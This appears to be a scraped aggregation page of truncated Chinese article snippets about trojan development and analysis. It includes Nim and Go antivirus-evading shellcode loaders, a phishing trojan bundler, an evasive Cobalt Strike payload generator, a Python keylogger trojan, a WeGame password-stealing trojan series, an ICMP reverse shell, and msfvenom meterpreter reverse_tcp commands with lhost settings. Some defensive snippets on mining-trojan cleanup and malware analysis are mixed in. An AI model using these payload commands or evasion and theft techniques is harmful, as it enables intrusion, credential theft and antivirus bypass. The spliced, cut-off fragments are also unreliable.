nim语言木马开发初探 [TOC] 说明 本文参考至 Nim之套接字免杀学习 (qq.com) 一、前言 在经过一段时间研究使用go语言进行shellcode加载器免杀之后发现go语言的效果并没有以前那么好了...它结合了其他成熟语言的成功概念(如 Python、Ada 和 Modula)。...QuitSuccess) 2.2 使用算法加密shellcode 静态免杀的一种,使用例如凯撒、异或等等加密方式使得杀软无法直接识别出shellcode 2.3 分离式免杀 基本原理就是将shellcode不写死在木马中...,而是将其保持在另外的文件中,在上传木马的时候同时上传shellcode文件,只在写入内存的情况下再进行读取。
免杀木马捆绑器 前言 在攻防演练中,钓鱼是十分重要的一环,能够快速撕破目标的伤口,为了让钓鱼木马更具有迷惑性,需要释放正常的文件进行隐藏,因此诞生此捆绑器 版本更新 1.1版本 bypass常规杀软 (...in %PATH% cannot get modified linker: exec: "garble": executable file not found in %PATH% 捆绑程序 第一个参数为木马程序...,第二个参数为正常文件 等待程序捆绑完成,输出 test.exe 运行后会对exe本身进行自删除,然后在当前目录下释放正常文件并打开,并释放木马至 C:\Users\Public\Videos目录下
Kworker 木马,如果发现root 权限计划任务有以下这种非常规任务,说明已经中招成了矿机 Dt 环境,大家要注意,切莫随便给开放端口。...cron.d/root && rm -f /etc/cron.d/root chattr -i /etc/cron.d/system && rm -f /etc/cron.d/system pkill python
环境: 攻击者:kali 目标主机:Windows 一、了解木马 1.木马,又称为特洛伊木马 特洛伊木马(Trojan Horse),这个名字源于公元前十二世纪希腊与特洛伊之间的一场战争。...-p php/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f raw -o muma.php python木马 msfvenom...-p python/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f raw -o muma.py 利用msfvenom制作木马时...三、木马的危害 由于本文探讨木马远控,这里就暂时省略文件上传、命令执行下载木马等方式将木马传入目标主机的讨论。...木马捆绑: 制作自解压木马(准备一个木马、一个图片、一个压缩软件即可) 攻击者可以制作一个自解压木马,诱导目标解压压缩包。在目标解压压缩文件的同时会运行压缩文件里的木马程序,从而被控制。
这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python自动补全插件)来撸代码。...首先准备好我们需要的依赖库,python hook和pythoncom。 下载(这个链接和原文一致)安装python hook ? 下载安装pythoncom模块: ?...Python之所以用起来方便快捷,主要归功于这些庞大的支持库,正所谓“人生苦短,快用Python”。...0x03 综合运用:完成一个简易木马 无论是keylogger记录下的内容,还是screenshotter截获的图片,只存在客户端是没有太大意义的,我们需要构建一个简单server和client端来进行通信...服务端接收到客户端的请求并作出响应: 0x04 结语 最后,你需要做的就是把上面三个模块结合起来,一个简易的具有键盘记录、屏幕截图并可以发送内容到我们服务端的木马就完成了。
类似前言一样的废话 上一次的文章中是分析了 Windows系统上 中国菜刀的工作原理,于是突发奇想,便想着用Python3也写一个和菜刀功能一样的程序出来,其实可变的地方还是挺少的,考虑的点只有4个而已...内容中,尤其是正则匹配部分尤其辣眼睛,所以有意见可以提出来,然后我忽略掉就好了 环境搭建 为了方便测试,所以我是在本地的虚拟机搭建一个 apache+php的环境然后在其根目录下放置一个 php一句话木马...开始乱写 首先我们要确定我们连接上木马文件,所需要什么东西 文件url 木马参数 没有这两个就无法建立连接,所以开头的时候先把他安排上 url=str(input("木马url: ")) parameter...url地址)parameter(木马参数)和无关紧要的header(http头部) ?...整合后的代码公众号后台留言 Python菜刀即可
根据Proofpoint安全研究人员的说法,新版本的Kronos银行木马正蠢蠢欲动,研究人员证实,最近三次宣传这个旧木马的翻新版本在2014年经历了鼎盛时期。...Kronos 2018版可能是新版Osiris木马 研究人员说,与此同时,这种新的Kronos变种开始出现在他们的雷达上,一名恶意软件作者开始在黑客论坛上宣传一种新的银行木马,他称之为Osiris。...最大的线索是这个新特洛伊木马的作者声称他的木马只有350 KB大小,接近于早期Kronos 2018版样本——研究人员4月份发现的(351 KB)大小。
一分钟了解什么是挖矿木马 什么是挖矿木马?...挖矿木马自查 挖矿木马自查 发现挖矿 CPU使用率 通常对挖矿木马的感知,主要表现在主机的使用感上,在主机正常运行的情况下,突然变得卡顿,并且CPU的使用率高于正常使用时的数值或达到了100%: 感知产品...当然,仅从卡顿和CPU使用率来判断是否中了挖矿木马是不准确的,从安全产品上能够更加准确直观的发现挖矿木马。...,即主机请求了“驱动人生”挖矿木马的相关域名。...网页挖矿 网页挖矿是指攻击者将挖矿木马植入正常网站,只要访问者通过浏览器浏览被恶意植入了网页挖矿木马站点,浏览器会即刻执行挖矿指令。
这一节主要给大家分享的是黑客是如何利用木马进行盗号的。 久前看了一些安全方面的书籍。在看完了《计算机病毒揭秘与对抗》---王倍昌书 以后,打算找个目标试试手。...但是这样就不太真实,自己写的小程序显然没有防御措施,模拟不了真实环境,体会不到写盗号木马的乐趣-。-! 后面的实战环节就会碰到一些问题,后面我会说明。...由于本次只是木马主要功能原理介绍,所以我并不介绍木马怎么隐藏、怎么绕过360防御(本文木马很容易被杀毒软件查杀)进行免杀。(-。-/主要我还没看。O(∩_∩)O)。...对于本次盗号木马,我觉得通过病毒感染的插入方式进行代码运行比较好。当然也可以进行捆绑,可以另起一个DLL,或者服务等等。但是插入式首先目标定位精准,因为他只影响WeGame。...于是我打算从更底层的驱动级别模拟开始,但是这样木马隐蔽性就下降了很多了,因为我们必须加载驱动了,没办法只可以这样了。事实证明,这次是成功的O(∩_∩)O --------。
工具开发-红队免杀木马自动生成器 开发目的 在攻防对抗中,免杀木马是使用频率最高的东西,但是制作起来需要耗费大量时间精力,重复性工作会让人产生疲惫和厌烦 于是我决定开发一款全自动的工具,只需要双击鼠标便可以生成免杀马...环境准备 由于本人比较熟悉go,于是决定用go进行开发,但是说实话在开发过程中感受到了很多局限性,比如依赖库问题,后续开发还是选用其他语言较好 环境准备:安装go和git,go版本需要1.20及以上 https...cannot get modified linker: exec: "garble": executable file not found in %PATH% 使用方法 我这个人比较喜欢简便,因此设计开发工具时不想添加...不放心可放至虚拟机进行使用 1、cobaltstrike都有吧,生成stageless的raw格式文件,把beacon.bin放到和生成器同一目录下,别改名字不然会生成失败 2、双击运行,不需要多余的操作,等待木马生成...,成功会在当前目录下生成随机六位数的exe木马文件 免杀效果 添加反沙箱可到VT 3 defender 火绒 360
看完了第一篇 WeGame盗号木马之旅(一) ,相信读者已经大概明白了我们需要干什么。...四、编写具体的病毒EXE,实现感染目标EXE并注入我们编写的木马代码。...开发环境: VisualStudio2015 ,驱动开发使用WDF驱动模型 目标: 这一篇我们实现驱动的开发。完成驱动模拟键盘点击。...实现: 驱动开发是一个蛋疼的活。最好有两台电脑方便调试,虚拟机也可以,因为很容易蓝屏重启。我使用虚拟机进行调试,我使用的驱动运行环境是WIN7 32位。...但是开发驱动不像一般的桌面程序开发,需要了解很多计算机底层的东西,而不仅仅是API的调用而已。 THE END
背景: 上一篇 WeGame盗号木马之旅(二) 我们实现了键盘按键模拟驱动的开发,这篇我们实现下具体注入代码的编写。 目标: 具体的注入代码编写。实现账号获取和密码获取。...至于这些代码的注入和入口点的修改会在开发 InfectiveVirus.exe是介绍,这些是他的工作。 在说明一点,开发注入的代码,最好直接用汇编语言写。
0×00背景 近日,腾讯反病毒实验室拦截到一批伪装成客户通知单的木马,该木马会根据自身文件名的不同而进行多种不同的恶意行为,经测试,目前国内的多款杀毒软件尚不能查杀该病毒,多个木马的变种MD5被多款安全软件加入到白名单中...该木马近期持续活跃,传播量上万,该木马有以下特点: 1)通过文件名控制自身行为,根据不同的文件名有着多达六十多种不同的行为。...3)篡改本地受信任数字证书列表,并构造证书给木马签名,逃避查杀。 ? 0×01木马文件概况 ?...,当然PlayLoad中还包含有少量的QQ粘虫木马(如ID 46),及其他游戏盗号木马。...0×03后记: 经过对木马加载器的详细分析和配置信息的猜测解读,做出如下图猜测,木马作者负责木马的免杀(同一个文件),并通过SQL Server上的配置信息来管理和销售木马,每卖出一个木马作者便为牧马人开立一个帐号
目标: 实现服务端的代码编写,用于接受木马发回的消息。 实现: 由于这一篇实现任务比较简单,我就讲一下密码的消息接收,账号类似。
前言 前文回顾: 教你学木马攻防 | 隧道木马 | 第一课 在上一篇文章中,我们讲解了木马中常用的端口转发技术,这一节讲解一下木马通信协议中的ICMP协议,并通过ICMP实现一个反弹shell。...从上面知道了ping包的结构,我们如果想通过ICMP协议传输数据,操作空间主要是在数据区中,而ping工具的做法是请求什么内容,就回复什么内容,所以设计反弹shell没办法用到ping工具,需要自己开发...先在VPS启动命令: python icmpsh_m.py 源ip 目的ip 接着在被控端启动命令: icmpsh.exe -t 目的ip 这样ICMP反弹shell就建立了,可以远程执行命令了...第四节 最后 推荐阅读: Python RASP 工程化:一次入侵的思考 教你学木马攻防 | 隧道木马 | 第一课 一个Python开源项目-哈勃沙箱源码剖析(下)
导读: 刘东发(http://www.codelive.net)的杰作——–远程控制木马”偷窥者”VC6.0编译通过。2001年是中国的木马大丰收的一年....这是一款VC++编写的木马,同时是世界上第一款结束杀毒软件进程(金山毒霸)的木马。这是木马发展史上的一个里程碑。之后许多木马/病毒都增加了这一功能。不过,它也不是开放源代码的。...======== 软件名称: 偷窥者(客户端/服务端) 当前版本: Ver1.5 作者: 刘东发 最后更新时间: 2001/11/12 开发工具...可以关闭一个偷窥. 9.在必要时可以关掉服务程序. 10.在连接断开时,每隔一定的时间可以自动进行重新连接. 2001/10/02 : 偷窥者客户端和服务端工程开始建立,进入开发阶段
Guildma是Tétrade银行木马家族中的一员,它活动频繁并处于持续开发状态。...当攻击者进行交易时,木马会利用WebView覆盖主屏幕或全屏打开某个网站,在用户查看屏幕时,攻击者会在后台使用金融应用程序执行交易。
首先需要了解如下内容 Qakbot:一个活跃的银行木马 Cobalt Strike:一款商业渗透测试工具,不幸的是,Cobalt Strike的盗版已经被泄露。...image.png 虽然被列入黑名单的JA3并不是Qakbot,但我们刚刚发现,这台主机感染了Gozi银行木马。 结论 即使是用于分析记录的网络流量,ntopng还是帮助您大致了解网络情况的好方法。
---- 基于github的木马 前言 《Python黑帽子:黑客与渗透测试编程之道》的读书笔记,会包括书中源码,并自己将其中一些改写成Python3版本。.../usr/bin/env python #-*- coding:utf8 -*- import os def run(**args): print "[*] In dirlister module...return str(files) 一个environment.py获取木马所在远程机器上的所有环境变量 #!...[ { "module":"dirlister" }, { "module":"environment" } ] 同样推送 4、编写基于github通信的木马 该木马从github.../usr/bin/env python #-*- coding:utf8 -*- import json import base64 import sys import time import imp
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
实时音视频
对象存储
即时通信 IM
